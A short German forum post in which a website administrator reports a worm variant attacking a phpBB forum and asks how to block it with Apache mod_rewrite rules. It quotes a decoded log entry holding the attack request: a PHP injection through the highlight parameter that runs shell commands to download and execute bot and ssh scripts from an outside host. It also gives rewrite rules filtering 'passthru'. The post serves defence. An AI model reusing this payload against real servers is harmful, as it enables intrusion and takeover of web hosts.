Es gibt eine neue 'Version' des Wurms, wenn man das ganze Decodiert sieht es so aus:
64.191.21.32 - - [25/Dec/2004:00:37:28 0100] "GET /forum/viewtopic.php?t=3958&rush=echo _START_; cd /tmp;wget civa.org/pdf/bot;perl bot;wget civa.org/pdf/ssh.a;perl ssh.a; echo _END_&highlight='.passthru($HTTP_GET_VARS[rush]).' HTTP/1.1" 200 103658 "-" "LWP::Simple/5.803"
Leider funktioniert ein mod_rewrite-Filter
RewriteCond %{QUERY_STRING} .*passthru.*
RewriteRule .* - [F,L]
nicht, weil das ganze Urlcodiert ist.
RewriteCond %{QUERY_STRING} .*%70%61%73%73%74%68%72%75.*
RewriteRule .* - [F,L]
funktioniert, aber ich finde das ganze nicht optimal. Jemand eine Idee? Kann man mod_rewrite die Url decodieren lassen?
Archiv
